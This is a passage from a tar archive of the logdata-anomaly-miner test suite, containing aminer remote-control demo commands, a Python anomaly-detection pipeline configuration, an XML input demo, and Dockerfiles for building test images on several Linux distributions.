learning phase. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', True)" sleep 1 #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False to end the learning phase. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" #prints the 'Resources.MaxMemoryUsage'; changes the property 'Resources.MaxMemoryUsage' to -1, which means all the available memory can be used and prints it again. sudo aminerremotecontrol --data '["Resources.MaxMemoryUsage", -1]' --exec 'print_config_property(analysis_context, "%s" % remote_control_data[0])' --exec 'change_config_property(analysis_context, "%s" % remote_control_data[0], remote_control_data[1])' --exec 'print_config_property(analysis_context, "%s" % remote_control_data[0])' #add a new NewMatchPathDetector to the config. sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet')" sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet1')" #prints the current config to the console. #sudo aminerremotecontrol --exec "print_current_config(analysis_context)" --string-response #saves the current config to /tmp/config.py sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')" #lists all the events from the VolatileLogarithmicBackoffEventHistory component, but the maximal count is 10. sudo aminerremotecontrol --exec "list_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',10)" --string-response #prints the event with the id 12 from the history. sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',12)" --string-response #prints the event with the id 13 from the history. sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',13)" --string-response #prints the event with the id 15 from the history. sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',15)" --string-response #ignores the events with the ids 12,13 and 15 from the history. sudo aminerremotecontrol --exec "ignore_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" --string-response #allowlists the events with the ids 21,22 and 23 from the history. sudo aminerremotecontrol --exec "allowlist_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[21,22,23])" --string-response # Currently following rules must be met to not create a allowlistViolation: # User root (logged in, logged out) or User 'username' (logged in, logged out) x minutes ago. # allowlist_rules = [Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # In the first step we print the current allowlist_rules. Maybe it is necessary to enlarge AnalysisChildRemoteControlHandler.maxControlPacketSize. #sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules')" --string-response # In the second step we add the user admin to not be tracked like the root user by adding another rule. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'admin'))]),Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # In the third step we rename the user admin to the user administrator and leave all other rules. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'administrator'))]),Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # In the last step we remove all special rules and only allow User 'username' (logged in, logged out) x minutes ago. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # Adds a new path to the known_path_set sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathDet',['/new/path1','/new/path2'])" --string-response # Persist all data. sudo aminerremotecontrol --exec "persist_all()" # List all backups. sudo aminerremotecontrol --exec "list_backups(analysis_context)" # Create a backup. sudo aminerremotecontrol --exec "create_backup(analysis_context)" # suspend the aminer. sudo aminerremotecontrol --exec "suspend" # activate the aminer. sudo aminerremotecontrol --exec "activate" # reopen all StreamPrinterEventHandler streams. sudo aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)" logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerRemoteControl/demo-config.py000066400000000000000000000501461500476301700304640ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However, if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPUWorkload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S')] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filters = AtomFilters.SubhandlerFilter(None) analysis_context.register_component(atom_filters, component_name="AtomFilter") from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filters]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.Utils import VolatileLogarithmicBackoffEventHistory volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(100) anomaly_event_handlers = [stream_printer_event_handler, volatile_logarithmic_backoff_event_history] analysis_context.register_component(volatile_logarithmic_backoff_event_history, component_name="VolatileLogarithmicBackoffEventHistory") # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers, use_real_time=True) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filters.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filters.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filters.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filters.add_handler(parser_count) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0, learn_mode=True) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filters.add_handler(ecd) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filters.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=False, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filters.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filters.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis(analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filters.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filters.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filters.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=False) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filters.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector( analysis_context.aminer_config, ['/model/type/path/id', '/model/type/syscall/id'], anomaly_event_handlers, id_path_list=['/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filters.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/Job Number', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=False) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filters.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=False, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filters.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filters.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule('CronJobAnnouncement', 5, 6, artefact_match_parameters=[ ('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filters.add_handler(time_correlation_violation_detector) from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerXmlInputDemo/000077500000000000000000000000001500476301700255065ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerXmlInputDemo/aminerXmlInputDemo.sh000077500000000000000000000022701500476301700316270ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh LOGFILE=/tmp/syslog sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $LOGFILE 2> /dev/null echo "Demo started.." echo "" FILE=/tmp/xml-input-demo-config.yml if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi read -r -d '' VAR << END Tove Jani Don't forget me this weekend! Don't forget me this weekend! Jani Tove Re: I will not I will not END echo "$VAR" >> $LOGFILE runAminerUntilEnd "sudo aminer --config $FILE" "$LOGFILE" "/tmp/lib/aminer/AnalysisChild/RepositioningData" "$FILE" exit $? logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerXmlInputDemo/xml-input-demo-config.yml000066400000000000000000000044111500476301700323530ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/syslog' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: id type: DecimalIntegerValueModelElement name: 'id' - id: opt type: FixedDataModelElement name: 'opt' args: 'text' - id: to type: AnyByteDataModelElement name: 'to' - id: from type: AnyByteDataModelElement name: 'from' - id: heading type: AnyByteDataModelElement name: 'heading' - id: text1 type: AnyByteDataModelElement name: 'text1' - id: text2 type: AnyByteDataModelElement name: 'text2' - id: xml start: True type: XmlModelElement name: 'model' xml_header_expected: True key_parser_dict: messages: - note: +id: id _+opt: opt to: to from: from ?heading: heading body: text1: text1 text2: text2 Input: timestamp_paths: None xml_format: True Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/messages/note/id/id" - "/model/messages/note/opt/opt" learn_mode: True output_logline: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/messages/note/id/id" - "/model/messages/note/opt/opt" learn_mode: True output_logline: True - type: SimpleUnparsedAtomHandler id: SimpleUnparsedAtomHandler EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/docker/000077500000000000000000000000001500476301700222505ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/docker/Dockerfile_deb000066400000000000000000000032641500476301700250610ustar00rootroot00000000000000# syntax=docker/dockerfile:1 # check=skip=InvalidDefaultArgInFrom # Pull base image. ARG vardistri FROM $vardistri ARG varbranch ENV BRANCH=$varbranch # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y --no-install-recommends apt-utils RUN apt-get update && apt-get install -y \ ansible \ git \ vim \ postfix \ procps \ cpulimit \ mailutils \ postfix \ rsyslog \ sudo \ curl \ apache2 \ locales \ locales-all RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \ dpkg-reconfigure --frontend=noninteractive locales && \ update-locale LANG=en_US.UTF-8 ENV LANG=en_US.UTF-8 ENV LANGUAGE=en_US:en ENV LC_ALL=en_US.UTF-8 ADD . /home/aminer/logdata-anomaly-miner RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b $varbranch -s /home/aminer/logdata-anomaly-miner ADD scripts/distritest.sh /distritest.sh RUN chmod 755 /distritest.sh RUN git clone -b $varbranch https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git /opt/wiki RUN awk '/^```yaml$/ && ++n == 1, /^```$/' < /opt/wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' | sed '/^```python/ d' > /home/aminer/gettingStarted-config.yml RUN ln -s /etc/aminer/conf-available/generic/ApacheAccessModel.py /etc/aminer/conf-enabled/ RUN echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer USER aminer WORKDIR /home/aminer ENTRYPOINT ["/distritest.sh"] logdata-anomaly-miner-2.8.0/aecid-testsuite/docker/Dockerfile_fed000066400000000000000000000026111500476301700250600ustar00rootroot00000000000000# Pull base image. FROM fedora:latest ARG varbranch ENV BRANCH=$varbranch # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary dnf packages RUN dnf install -y \ ansible \ git \ vim \ postfix \ procps \ cpulimit \ sendmail \ sendmail-cf \ postfix \ rsyslog \ sudo \ curl \ httpd \ glibc-locale-source \ glibc-langpack-en ENV LANG=en_US.UTF-8 ENV LANGUAGE=en_US:en ENV LC_ALL=en_US.UTF-8 RUN localedef --force -i en_US -f UTF-8 en_US.UTF-8 ADD . /home/aminer/logdata-anomaly-miner RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b $varbranch -s /home/aminer/logdata-anomaly-miner ADD scripts/distritest.sh /distritest.sh RUN chmod 755 /distritest.sh RUN git clone -b $varbranch https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git /opt/wiki RUN awk '/^```yaml$/ && ++n == 1, /^```$/' < /opt/wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' | sed '/^```python/ d' > /home/aminer/gettingStarted-config.yml RUN ln -s /etc/aminer/conf-available/generic/ApacheAccessModel.py /etc/aminer/conf-enabled/ RUN echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer USER aminer WORKDIR /home/aminer ENTRYPOINT ["/distritest.sh"] logdata-anomaly-miner-2.8.0/aecid-testsuite/docker/Dockerfile_red000066400000000000000000000035571500476301700251060ustar00rootroot00000000000000# Pull base image. FROM redhat/ubi9 ARG varbranch ENV BRANCH=$varbranch # allow the system to use two package managers (apt and pip), as we do it intentionally (needed since Debain Bookworm - see PEP 668 ENV PIP_BREAK_SYSTEM_PACKAGES=1 # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" RUN dnf install https://dl.fedoraproject.org/pub/epel/epel-release-latest-9.noarch.rpm python3-pip sudo -y RUN sudo pip3 install ansible ENV PATH="$PATH:/usr/local/bin" # Install necessary dnf packages RUN dnf install -y --allowerasing \ git \ vim \ postfix \ procps \ cpulimit \ exim \ postfix \ rsyslog \ curl \ httpd \ glibc-locale-source \ glibc-langpack-en \ python3-pylibacl ENV LANG=en_US.UTF-8 ENV LANGUAGE=en_US:en ENV LC_ALL=en_US.UTF-8 RUN localedef --force -i en_US -f UTF-8 en_US.UTF-8 ADD . /home/aminer/logdata-anomaly-miner RUN sed -i "s?sudo ansible-playbook playbook.yml?sudo /usr/local/bin/ansible-playbook playbook.yml?g" /home/aminer/logdata-anomaly-miner/scripts/aminer_install.sh RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b $varbranch -s /home/aminer/logdata-anomaly-miner ADD scripts/distritest.sh /distritest.sh RUN chmod 